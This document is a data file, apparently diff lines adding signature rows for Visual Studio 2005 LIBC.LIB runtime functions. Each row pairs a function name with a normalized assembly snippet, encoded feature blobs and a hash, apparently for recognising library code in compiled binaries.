+_putwc,PUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,WlVPAwAAAAAAAAAA,nIZROGYLpgVnTHFqZ0xxaj/DesUAAAAA/qOPyD/DesUAAAAAu7ZcLN8TwOXfE8DlZgumBT/DesUAAAAAV/duOZyGUTjnC9+Xz1GtdwbJvNEAAAAAP8N6xQAAAAAAAAAABsm80bu2XCwAAAAAEliWmD4tmf4AAAAAPi2Z/ru2XCwAAAAAu7ZcLP6jj8iWfJuvlnybrz/DesUAAAAA5wvflxRzrGX3825o3xPA5VKiZ88vUP9ML1D/TLu2XCwAAAAA9/NuaNJEIioAAAAAUqJnz7u2XCwAAAAAFHOsZZyGUTg6THsM0kQiKpyGUTg6THsMu7ZcLP6jj8jfE8Dl3xPA5ciUmvi/v5nTOkx7DLu2XCyD8oEZv7+Z0wbJvNEAAAAAyJSa+D4tmf4AAAAAg/KBGf6jj8gAAAAA3xPA5RJYlpjPUa13,0151607032ce108db2b2cd2e24de6db320bf2044,VS2005,LIBC.LIB
+__cgets,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32",FMSIavAYcURDhZukgvcbCd+9SP5meTE1H7kv0eXdncQAAAAAQvjW1gAAAAAAAAAAQ4WbpOXdncQAAAAAN0fR6uXdncTBhC/vuyGU9uXdncTBhC/vJw91Eru2XCwBY7Fj8BhxREL41tYAAAAA5d2dxEL41tYAAAAAZnkxNUL41tYAAAAAwYQv78vPpoofuS/RAWOxY+XdncQAAAAA371I/rshlPY3R9Hqy8+miru2XCwnD3USu7ZcLPAYcUQUxIhqkmXvEd+9SP5meTE1I22H8IL3GwmSZe8R,[],c85328bafbdd4b0890420253344fc5a2bb639f92,VS2005,LIBC.LIB
+_time,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",cbgfqjplNTxTTYHzu7ZcLA3MwAHP62IcU02B8zplNTwAAAAAOmU1PAAAAAAAAAAAz+tiHA3MwAGchlE4UsNPQCpbbJcAAAAANQTt+Z8LJE2i/Ky5ovysuZ8LJE2i/Ky5nIZROA3MwAENDA4govysuZ8LJE2i/Ky5nwskTelDGwK7tlwsDQwOIHG4H6oAAAAAovysuZ8LJE2i/Ky5DczAAXG4H6oAAAAAovysuZ8LJE1Sw09A6UMbAjplNTxTTYHzKltslzplNTxTTYHz,[],e3d2b7ad023194389bab9165c29170a01004e864,VS2005,LIBC.LIB
+__chmod,"CALL DWORD PTR DS:[0]\nPUSH R32\nCALL CONST\nPOP R32\nOR R32,CONST\nRETN",p+n+4qse9A4AAAAAotec1VLONpUD9syIUs42lQAAAAAAAAAAMETjpAP2zIgw/Hwiqx70DlLONpUD9syIA/bMiAAAAAAAAAAAMPx8IqLXnNWn6f7i,[],7bcc0bb7775e60b8ef972379103e74f305faed3d,VS2005,LIBC.LIB
+__wcsdup,"PUSH R32\nCALL CONST\nLEA R32,DWORD PTR DS:[R32+R32+CONST]\nPUSH R32\nCALL CONST\nPOP R32\nTEST R32,R32\nPOP R32",S+j+OQAAAAAAAAAAkTDPGE+LzAroxZKo6MWSqE+LzApL6P45T4vMCgAAAAAAAAAA,[],07baabe11aa3dada91c4f3a2a99d4b9663ef386e,VS2005,LIBC.LIB
+__strnicmp,"INC R32\nINC R32\nPUSH R32\nPUSH R32\nPUSH R32\nCALL CONST\nMOV R32,R32\nADD ESP,CONST",xNmJwAAAAAAAAAAAs8e6qk53gnzYzQSm2M0Epk53gnw04PrCNOD6wtjNBKbYzQSm2M0EptjNBKaymcisspnIrNjNBKYAAAAA2M0EptjNBKbYzQSm2M0EptjNBKaymcisspnIrNjNBKYAAAAA2M0EpuhVq9qX2nuUl9p7lLPHuqpOd4J8TneCfMTZicDoVava6FWr2sTZicANzMABDczAAcTZicAAAAAA4zskmYJnqX4AAAAAgmepfuRSvJ9y6DpFcug6ReRSvJ/y4eVj8uHlY+hVq9qX2nuUFp+5AMTZicA11bmaNdW5muM7JJkmLoOhl9p7lIJnqX7kUryf5FK8n8TZicDoVava6FWr2sTZicAm7uFlJi6DobPHuqoAAAAAJu7hZcTZicAAAAAA,[],36bb50ba536012d17789ed073b0a11529b57f7a9,VS2005,LIBC.LIB
+___crtGetCommandLineW,"LEA R32,DWORD PTR DS:[R32+R32]\nPUSH R32\nCALL CONST\nMOV EBP,R32\nPOP R32\nTEST EBP,EBP\nJCC CONST",vG+DEybu4WUGgcpPBoHKTybu4WXy8bljuZvuqibu4WUAAAAAGaZm/xNwtNoAAAAAGaZm/7xvgxMAAAAAJu7hZaqT3bIAAAAAqpPdsgAAAAAAAAAA4xhVieMYVYkZpmb/8vG5Yw3MwAG5m+6qu7ZcLLu2XCwTcLTaDczAAaqT3bIAAAAAT8PUd7u2XCzjGFWJE3C02qqT3bIAAAAA4xhViSbu4WUZpmb/u7ZcLCbu4WW8b4MT,[],94adbd983d8761e2d0dd1a0e7fc8211543aaae8c,VS2005,LIBC.LIB
+_printf,"PUSH R32\nPUSH R32\nMOV R32,CONST\nPUSH R32\nPUSH R32\nCALL CONST\nMOV R32,R32\nLEA R32,DWORD PTR SS:[ESP+CONST]",IoaudwAAAAAAAAAA,+y3xuG1kpmJeToBoXk6AaG1kpmL2nGVUDczAASh59rYAAAAARyjsnAAAAAAAAAAAWNooOk+LzAr1QnMb9pxlVEco7JwAAAAAR7G+cE+LzApY2ig69UJzG0+LzAr7LfG4T4vMCgAAAAAAAAAAKHn2tk+LzAr7LfG4bWSmYkco7JwAAAAAWNooOljaKDoNzMAB,cce130fdc0d2a37a80fc4357655274a5984472bf,VS2005,LIBC.LIB
+__wgetenv,"PUSH R32\nPUSH R32\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",DWe7UsSSpmivqNlxFaIxVibu4WVSaOpbJu7hZTlafGAAAAAARSlDKsZr930AAAAAOVp8YAAAAAAAAAAAr6jZcbJWpaDEkqZoUmjqWybu4WXGf7PDnVxJNibu4WVy6DpFxmv3fSbu4WWIXCPrxn+zwybu4WUWOAgiiFwj68SSpmgNZ7tSxJKmaMZr930AAAAAslaloDlafGAAAAAAFjgIIibu4WVFKUMqcug6RRY4CCIVojFW,[],1cb801ff27bcd4024096897a34b0693c1a033d4b,VS2005,LIBC.LIB
+_memcmp,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32\nMOV R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nOR R32,R32\nAND CONST2,CONST\nJCC CONST",2M0EpiqzQt6X2nuUl9p7lD/DesUhrHjtIax47SqzQt6HR1I/6FWr2n7U+jGyxNEzssTRM0TTo21794Xwe/eF8Fndh3Z+1Poxh0dSPz/DesUAAAAAP8N6xQAAAAAAAAAAftT6MUTTo20k65G/JOuRv0TTo20vGjTcLxo03H7U+jFZ3Yd2Wd2HdgGhdbMAAAAAAaF1swAAAAAAAAAAU3FSS3LoOkXGozfIxqM3yHLoOkXrqEL466hC+CqzQt7YzQSm2M0EpiqzQt5MYWxWTGFsViqzQt6ymcisspnIrCqzQt4AAAAAKrNC3kTTo20AAAAARNOjbQAAAAAAAAAAFjgIIgGhdbM4ZRVucug6RVndh3Z24CM8duAjPCqzQt6X2nuUOGUVblNxUkvoVaval9p7lD/DesXYzQSm,[],6410a2abc766d3336fda73cdd0daa166addc85b1,VS2005,LIBC.LIB
+_gmtime,"MOV R32,R32\nPUSH R32\nPUSH R32\nMOV R32,CONST\nCDQ\nIDIV R32\nMOV R32,R32\nIMUL R32,R32,CONST",hOWgnozu1BZmeTE1YQrRVDr7gNQAAAAAWL1G0nHLPcJ4ksniPWXFezr7gNQAAAAAP8N6xQAAAAAAAAAAOvuA1BxLFiGxzK+LZnkxNT/DesUAAAAAscyvizr7gNQAAAAAccs9wj1lxXthCtFUHEsWIT/DesUAAAAAjO7UFisfmAT81CstKx+YBD1lxXthCtFUeJLJ4isfmAQAAAAA/NQrLSsfmARYvUbS,[],35653b45ea5b844730804c4ef518d85c3f06cf48,VS2005,LIBC.LIB
+___crtMessageBoxA,"MOV R32,DWORD PTR DS:[0]\nPUSH CONST\nPUSH R32\nCALL R32\nTEST R32,R32\nMOV DWORD PTR DS:[0],R32\nJCC CONST",DczAATlafGAAAAAAVZT/VTlafGAAAAAAS6l9YAIojUxVlP9VAiiNTDlafGAAAAAAS6l9YAIojUxBNVUl2pCkCQIojUxBNVUlQTVVJQIojUxLqX1gersdvA3MwAHxyGgE8choBA3MwAHakKQJlwCtt0upfWB6ux28OVp8YAAAAAAAAAAA,[],0fcf78fb20590c59df19378f7147d782bc0cdc21,VS2005,LIBC.LIB
+__mbscoll,PUSH DWORD PTR DS:[0]\nPUSH -1\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH -1\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nPUSH DWORD PTR DS:[0]\nCALL CONST,tf9giJuQUPzIc6cKm5BQ/AAAAAAAAAAAyHOnCgAAAAAAAAAA,[],115f651f4e1bbeb951eea0c9bbcdc780f8de2a07,VS2005,LIBC.LIB
+__cabs,FLD QWORD PTR SS:[ESP+CONST]\nPUSH CONST\nPUSH R32\nPUSH R32\nFSTP QWORD PTR SS:[ESP]\nFLD QWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32,Wp2NJAAAAAAAAAAA,EGYdIAwaAOCLPwWDiz8Fg6cx3TI3vWdR5BJ2dkL41tYAAAAAjPjVeEvPKmGM+NV4iz8Fg4s/BYOWduU/jPjVeEvPKmEzUiVvrpvnU+QSdnYAAAAAM1Ilb0L41tYAAAAAlnblP6cx3TI3vWdRQvjW1gAAAAAAAAAA6FWr2uwQJMOyQRNWS88qYQAAAAAAAAAAskETVuQSdnYAAAAADBoA4BpCU6K7IZT2N71nURJKgga2Vtj3pzHdMhJKgga2Vtj3uyGU9r2/wiOchlE4tlbY9xp0S58AAAAA62078UL41tYAAAAAnIZROL2/wiMaQlOiEkqCBjYj/WakjFVWGkJTooz41Xi7IZT2NwkdZAwaAOAQZh0guyGU9r2/wiOchlE4nIZROIz41Xi9v8IjpIxVVkL41tYAAAAAvb/CI0L41tYAAAAA7BAkw66b51PrbTvxskETVuQSdnYAAAAANiP9ZuhVq9qyQRNWGnRLnzYj/WakjFVW,bea4e89aae50ad887ded8d72ebbac417b9abd609,VS2005,LIBC.LIB
+__hypot,FLD QWORD PTR SS:[ESP+CONST]\nPUSH CONST\nPUSH R32\nPUSH R32\nFSTP QWORD PTR SS:[ESP]\nFLD QWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32,Wp2NJAAAAAAAAAAA,uyGU9r2/wiOchlE4nIZROIz41Xi9v8IjpIxVVkL41tYAAAAAvb/CI0L41tYAAAAA62078UL41tYAAAAA7BAkw66b51PrbTvxskETVuQSdnYAAAAANiP9ZuhVq9qyQRNWEGYdIAwaAOCLPwWD5BJ2dkL41tYAAAAAQvjW1gAAAAAAAAAAiz8Fg4s/BYOWduU/rpvnU+QSdnYAAAAAM1Ilb0L41tYAAAAAlnblP6cx3TI3vWdRiz8Fg6cx3TI3vWdRS88qYQAAAAAAAAAAjPjVeEvPKmGM+NV4skETVuQSdnYAAAAAGnRLnzYj/WakjFVWDBoA4BpCU6K7IZT2N71nURJKgga2Vtj36FWr2uwQJMOyQRNWpzHdMhJKgga2Vtj3uyGU9r2/wiOchlE4tlbY9xp0S58AAAAAnIZROL2/wiMaQlOijPjVeEvPKmEzUiVvEkqCBjYj/WakjFVWGkJTooz41Xi7IZT2NwkdZAwaAOAQZh0g,d0ae6b33c266f3d7c051aef73363cd741f7679c0,VS2005,LIBC.LIB
+___wtomb_environ,"PUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[R32+CONST]\nADD R32,CONST\nPOP R32\nCMP R32,R32\nPOP R32",xJKmaJIUImsAAAAAu18Q8MSSpmgSVJTvMFP50jPFEDcm7uFl5htssTPFEDcAAAAAM8UQN8SSpmi7XxDwElSU78SSpmgwU/nS26zVXSbu4WXmG2yxJu7hZZIUImsAAAAAkhQiawAAAAAAAAAA,[],45863d30e21a160cd70a13048a86c171f5376052,VS2005,LIBC.LIB
+_strtod,"MOVZX R32,BYTE PTR DS:[R32]\nPUSH CONST\nPUSH R32\nCALL CONST\nPOP R32\nPOP R32\nJMP SHORT CONST",cug6RaiBaXXo/oHQMefoxRmmZv8AAAAAY+6ffHLoOkUAAAAAhtVCSxmmZv/ZMcqeEX+cF1vQFeAlhRBniUpaaQAAAAAAAAAAqIFpdWDXD40Rf5wXP8N6xQAAAAAAAAAAYNcPjVvQFeAlhRBnPdcFpKiBaXXo/oHQ2THKnj/DesUAAAAAGaZm/z/DesUAAAAAN65LxD3XBaRj7p986P6B0CQDw50AAAAAJYUQZz/DesVF33qQJAPDnT3XBaRj7p98Rd96kD/DesUAAAAAW9AV4IlKWmkx5+jFW9AV4FvQFeCG1UJL,[],be104ddb32949bc66df42cf4ef75db7b34137f57,VS2005,LIBC.LIB
+__fltinf,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nPOP R32\nTEST R8,CONST\nPOP R32",u7ZcLFvQFeD4RNCx+ETQsR5zgRa7tlwsW9AV4B5zgRa7tlwsLIUPFPhE0LG7tlwsu7ZcLKnQJ8Qec4EWAmqyIyyFDxTejPzUHnOBFmDt3MXjTlfC405XwgAAAAAAAAAAYO3cxQAAAAAAAAAAqdAnxGDt3MXjTlfC3oz81KnQJ8QAAAAA,[],509ec3c462c8c2e2658636286949ba2b16b32eae,VS2005,LIBC.LIB
+_calloc,"PUSH CONST\nPOP R32\nADD R32,CONST\nAND R32,CONST\nXOR R32,R32\nCMP R32,-20\nJCC CONST",xTLSES0M2vZy6DpFLQza9iQDw51b11Z2cug6RZHUeluaPEgSXqODJy0M2vYAAAAAW9dWdvmliT0WXTr5hIDe1DlafGAAAAAAFl06+YSA3tT5pYk9JAPDnSbu4WWIXCPrJu7hZTlafGAAAAAAOVp8YAAAAAAAAAAAmjxIEiQDw51b11Z2DczAATlafGAAAAAAiFwj6w3MwAFeo4Mn+aWJPSbu4WUkA8OdkdR6WyQDw51b11Z2,[],eb061a8e83c4f0269a54641c827db8097163b287,VS2005,LIBC.LIB
+_ceil,CALL CONST\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR SS:[EBP+CONST]\nPOP R32\nPOP R32\nFSTSW R16\nSAHF,ytyH9E3UNygAAAAANSF3nFvQFeCA2MrFW9AV4IDYysVyEpMTLokCbgAAAAAAAAAAchKTE03UNygAAAAAgNjKxS6JAm4AAAAA3IFotsrch/S7tlwsiZh/MC6JAm4AAAAAgNjKxS6JAm4AAAAAu7ZcLIDYysW7tlws6/7prTUhd5zcgWi2u7ZcLMrch/SJmH8wTdQ3KC6JAm4AAAAA,[],07aa1ee3a15b283e760655adfeb22198f4938b1c,VS2005,LIBC.LIB
+__execv,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",QuVyowAAAAAAAAAA,TQTaVnLoOkXpXXtoXqODJ4xJJ/AAAAAAbG0m44xJJ/AAAAAA6V17aHLoOkUAAAAAjEkn8HLoOkUAAAAAcug6RfQ42DYSoox5EqKMefQ42DZEhrUCcug6RUFF0Bu5m+6qzszf5KOqj/HEkqZouZvuqkFF0BsAAAAAQUXQG0L41tYAAAAARIa1AsSSpmjx1sdAQvjW1gAAAAAAAAAAxJKmaEL41tYAAAAAo6qP8X3NIQcAAAAA8dbHQPQ42DYAAAAAfc0hB2xtJuNLfz7WHV2wR3LoOkVy6DpFcug6Rfvd3QRy6DpFcug6RfQ42Db73d0E+93dBM7M3+RNBNpW9DjYNs7M3+RNBNpWS38+1n3NIQdeo4Mn,48684e913a5fff862e7f45666ae48ce40ee7eddd,VS2005,LIBC.LIB
+___STRINGTOLD,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nXOR R32,R32\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32",JKOZXOudzdcAAAAA653N1wAAAAAAAAAAtWC3H+udzdcko5lc,[],4386afefa30cfcb0304f88b327dbe600e5fb72c4,VS2005,LIBC.LIB
+___strgtold12,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32",ohLiOkFF0BsnD3USnIZROJyGUTgz+rYvJw91EpwIsUgQb2PyM/q2LxW0sB0AAAAAEG9j8pwIsUgAAAAAnAixSGnNBgAAAAAAQUXQG2nNBgAAAAAAac0GALpeKO9hmoGJ6FWr2mVmWrH0Ke4IiDHBK5yGUTgAAAAA9CnuCIy0L8MAAAAASDQjuwAAAAAAAAAAYZqBicb+uL78irka/Iq5GmGagYkAAAAAZWZasZyGUTgAAAAA5JqU9Oj+gdBb0BXgxv64vg5+bn5Ub7TYW9AV4Oj+gdBb0BXgW9AV4Oj+gdBb0BXgW9AV4FhZdp/o/oHQ6P6B0OSalPQAAAAAWFl2n8qVNjsAAAAAul4o75yGUTgAAAAAypU2O079CxRINCO7Tv0LFGYCg5s1FnITVG+02LshlPYOfm5+Dn5ufrshlPYOfm5+BIqLWRW0sB0AAAAANRZyE8qVNjsAAAAADn5ufuhVq9q06ChhuyGU9uhVq9q06ChhtOgoYehVq9qIMcErnIZROBW0sB1yjluXco5blxW0sB0AAAAAZgKDmwSKi1miEuI6jLQvw5yGUTgAAAAAFaQbjeSalPQAAAAA6FWr2uhVq9qIMcErFbSwHQAAAAAAAAAA,[],6685f4b675acd7067bba815bd1c50ee2c6a0ed4a,VS2005,LIBC.LIB
+_malloc,PUSH DWORD PTR DS:[0]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,fz7lvQAAAAAAAAAA,zSwRpibu4WVasJfoWrCX6AGhdbPf6hBMJu7hZQGhdbMAAAAAAaF1swAAAAAAAAAA3+oQTAGhdbNasJfoWrCX6Fqwl+gm7uFl,3fd5c341462062bc0f4c0bbb66f75dfec2a082b2,VS2005,LIBC.LIB
+__heap_alloc,"ADD R32,CONST\nAND R32,CONST\nPUSH R32\nPUSH CONST\nPUSH DWORD PTR DS:[0]\nCALL DWORD PTR DS:[0]\nPOP R32\nRETN",iFwj6wDh1mty6DpFAOHWawAAAAAAAAAAcug6RSy3jmOPktBTj5LQUwAAAAAAAAAALLeOYwAAAAAAAAAAoTaV63LoOkWIXCPr,[],13ff9de2d3213a7837586a1448a4f9a3ee8b03a7,VS2005,LIBC.LIB
+__nh_malloc,"PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",AaF1swAAAAAAAAAA3+oQTAGhdbNasJfoWrCX6Fqwl+gm7uFlzSwRpibu4WVasJfoWrCX6AGhdbPf6hBMJu7hZQGhdbMAAAAA,[],4bb427a6e1589cabf66850afb539bfaaebae25e8,VS2005,LIBC.LIB
+__setsystime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R16,WORD PTR DS:[R32+CONST]",rN+z5gAAAAAAAAAA/zj4jqzfs+aDOxbkgzsW5AAAAAAAAAAA,[],77ef72d105b1acd64bf40b47c422f142a864f03c,VS2005,LIBC.LIB
+__getsystime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nMOVZX R32,WORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]",cxVThgAAAAAAAAAA,[],b5d2ac5e94bc3f3e4040949ca06bf72c3ba4d0e2,VS2005,LIBC.LIB
+?_query_new_handler@@YAP6AHI@ZXZ,"MOV R32,DWORD PTR DS:[0]\nRETN",DcG51AAAAAAAAAAA,[],a84f246eb814acab8074ce2b2fff3668005d5e94,VS2005,LIBC.LIB
+?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nRETN",VAaI5gAAAAAAAAAA,[],7137a6e8ef1a8e12f742c0172399a5870b8fcaf0,VS2005,LIBC.LIB
+__callnewh,"PUSH DWORD PTR SS:[ESP+CONST]\nCALL R32\nTEST R32,R32\nPOP R32\nJCC CONST",ZW+HnVLONpVSDvi0Ug74tAAAAAAAAAAAUs42lQAAAAAAAAAAS6l9YFLONpVlb4ed,[],edac8d53c15e909e2face78a694306a538b28357,VS2005,LIBC.LIB
+__futime,"LEA R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",43U0oGOmfIRRLq5M2MX2RGOmfIR0yfl6LokCbgAAAAAAAAAAUS6uTGOmfIQtjqF8iFwj62OmfIRwuZxdnpwA+QXzyGrjdTSgDczAAS6JAm4AAAAABfPIamOmfIRRLq5MdMn5emOmfIQNzMABY6Z8hC6JAm4AAAAALY6hfGOmfISIXCPrcLmcXWOmfITYxfZE,[],e2daa5d3891df7f326ade3e93eb14cfae1421347,VS2005,LIBC.LIB
+__utime,"PUSH R32\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32\nPOP R32",wrxAVgAAAAAAAAAA/cc7ThVcSKXCvEBWFVxIpQAAAAAAAAAA,[],1e6f690bf3f6177093b192ceff9ec49d7df78281,VS2005,LIBC.LIB
+_fopen,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",QuVyowAAAAAAAAAA,AaF1swAAAAAAAAAA64UqTAAAAAAAAAAAUmjqW+uFKkwBoXWz,aa38967ac3e6163c92b4935f49cf7d06611b255b,VS2005,LIBC.LIB
+__fsopen,"PUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",UmjqW+uFKkwBoXWzAaF1swAAAAAAAAAA64UqTAAAAAAAAAAA,[],04ed7ef29bdc0538d420b30b96357921c6319604,VS2005,LIBC.LIB
+__mbsspn,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nXOR R32,R32\nCMP DWORD PTR DS:[0],R32\nJCC CONST",P8N6xQAAAAAAAAAAnY6pcOXrG2jl6xtoDczAAa8h//QAAAAAryH/9Nilo2pZ3Yd2ryH/9Fndh3avIf/05esbaCdGqp6vIf/0CfNPaidGqp4NzMAB5esbaAnzT2qt4xSlWd2HdkFF0BsAAAAAryH/9J2OqXAnRqqeQUXQGz/DesUAAAAAkhlQFkFF0BvOAREiJ0aqnlndh3blsZZOo4V1dj/DesUAAAAAWhZ4JJIZUBajhXV2reMUpSdGqp4J809q5bGWTq8h//SvIf/0zgERItilo2oAAAAA2KWjaidGqp6djqlw,[],f738bd05ea708e1878fc6dea80ebaa72ac74fe78,VS2005,LIBC.LIB
+___init_numeric,"PUSH R32\nXOR R32,R32\nCMP DWORD PTR DS:[CONST],R32\nPUSH EBP\nPUSH R32\nMOVZX R32,WORD PTR DS:[CONST]\nJCC CONST",/wxKkybu4WUAAAAAJu7hZTlafGAAAAAAYupOh68nV1xT/QYCOVp8YAAAAAAAAAAA+/r6sK8nV1zIvLP6rydXXDlafGAAAAAA2CHJrSW1tAGeh7ukJbW0Af8MSpOe3Nfvnoe7pDlafGAAAAAAEHqoT2LqTofYIcmtyLyz+jlafGAAAAAAU/0GAq8nV1z7+vqwntzX7ybu4WUAAAAA,[],d88013af494c7c0121565699d24f419b2f91eaaf,VS2005,LIBC.LIB
+_atoi,PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nRETN,x2MDRgAAAAAAAAAA,YU0sqaqT3bLHqQNfuKgtez3XBaRj7p98+awP0GFNLKlIQkbEx6kDXwAAAAAAAAAA2D8GePmsD9DCgPP8JAPDnT3XBaRj7p98srlFR/msD9DCgPP8u7ZcLLK5RUfYPwZ4JAPDnfmsD9DCgPP8SEJGxCQDw50AAAAAcug6RQvLb5bo/oHQPdcFpAvLb5bo/oHQY+6ffHLoOkUAAAAA6P6B0CQDw50AAAAAqpPdsgAAAAAAAAAAwoDz/HLoOkUAAAAAC8tvltg/Bni7tlwscug6RWFNLKlIQkbE,efed97183fc4e9f79b547a23bc81a326507cf398,VS2005,LIBC.LIB
+_atol,"MOVZX R32,BYTE PTR DS:[R32]\nPUSH CONST\nPUSH R32\nCALL CONST\nPOP R32\nPOP R32\nJMP SHORT CONST",YU0sqaqT3bLHqQNfuKgtez3XBaRj7p98PdcFpAvLb5bo/oHQ+awP0GFNLKlIQkbEqpPdsgAAAAAAAAAAx6kDXwAAAAAAAAAAu7ZcLLK5RUfYPwZ42D8GePmsD9DCgPP8cug6RWFNLKlIQkbEJAPDnT3XBaRj7p98srlFR/msD9DCgPP8JAPDnfmsD9DCgPP8cug6RQvLb5bo/oHQSEJGxCQDw50AAAAAY+6ffHLoOkUAAAAA6P6B0CQDw50AAAAAwoDz/HLoOkUAAAAAC8tvltg/Bni7tlws,[],113b6761cf6bdccf988bd7c77d9ca6fec7b86309,VS2005,LIBC.LIB
+__atoi64,"MOVZX R32,BYTE PTR DS:[R32]\nPUSH CONST\nPUSH R32\nCALL CONST\nPOP R32\nPOP R32\nJMP SHORT CONST",pslFn4Am7ua7tlwswoDz/HLoOkUAAAAAnhI+k9Ulr9Q/QbjZz5mtpT3XBaRj7p98PdcFpKbJRZ/o/oHQ6P6B0CQDw50AAAAAu7ZcLEnbXcyAJu7mJAPDnT3XBaRj7p98+awP0J4SPpP4CVYnP0G42ZIUImsAAAAAY+6ffHLoOkUAAAAAgCbu5vmsD9DCgPP8cug6RZ4SPpP4CVYnSdtdzPmsD9DCgPP8cug6RabJRZ/o/oHQJAPDnfmsD9DCgPP81SWv1AAAAAAAAAAAkhQiawAAAAAAAAAA+AlWJyQDw50AAAAA,[],127c34adf51f2b142aa9c1255867771aac4dda63,VS2005,LIBC.LIB
+__wcsicmp,"MOV R16,WORD PTR DS:[R32]\nINC R32\nPUSH R32\nINC R32\nCALL CONST\nMOV R32,R32\nMOV R16,WORD PTR DS:[R32]\nINC R32",7ryWW+68llvqMoS4JKOZXBCuhOQAAAAAWd2HdlpQs4sAAAAAWlCziwAAAAAAAAAAEK6E5FpQs4uM+NV46jKEuO68llsko5lcXqODJ1pQs4sAAAAAjPjVeO68llteo4MnqkUBflZhxXg6pKQ0JKOZXO68llsAAAAA7ryWWxCuhOTqMoS4VmHFeFndh3aM+NV4OqSkNO68llsAAAAA6jKEuBCuhOQko5lcjPjVeOEEOJhZ3Yd24QQ4mFndh3aM+NV4,[],59559dc0aa58c003d6a3affde982273a416fac42,VS2005,LIBC.LIB
+__cwild,"LEA R32,DWORD PTR DS:[R32*4+CONST]\nPUSH R32\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",cug6RTl8Awu0QwJrtEMCa3LoOkUAAAAAOXwDC4U6hg/CvEBWwrxAVgAAAAAAAAAAhTqGD3LoOkUAAAAA/f9jIyqOLQJzHpsacug6RSRxuIUla7R7JWu0e3LoOkUAAAAAxmv3fSqOLQJzHpsacx6bGtF0+9Y9x4AMJHG4hU+LzArjcxr7S6l9YE+LzArjcxr7PceADAcQTmYAAAAA0XT71ooLKAWc+wQv43Ma+0upfWAAAAAAnPsEL2+twNoAAAAAT4vMCgAAAAAAAAAAigsoBcK8QFbEkqZoBxBOZsK8QFbEkqZob63A2sK8QFbEkqZoxJKmaMZr930AAAAAKo4tAnLoOkUAAAAA,[],7a39adefd50747ccae8abb59b51f0f8a07de5d93,VS2005,LIBC.LIB
+__beep,PUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL DWORD PTR DS:[0]\nRETN,nAZ5/AAAAAAAAAAA,[],11b60134d6faaa114289aaa0e867f67b667bbe57,VS2005,LIBC.LIB
+__sleep,PUSH CONST\nPOP R32\nPUSH R32\nCALL DWORD PTR DS:[0]\nRETN,FjgIIpRXgCBJbAWNlFeAIAAAAAAAAAAASWwFjQAAAAAAAAAA,[],f257ddfea0adc01272984491a58b8b6e32fbea06,VS2005,LIBC.LIB
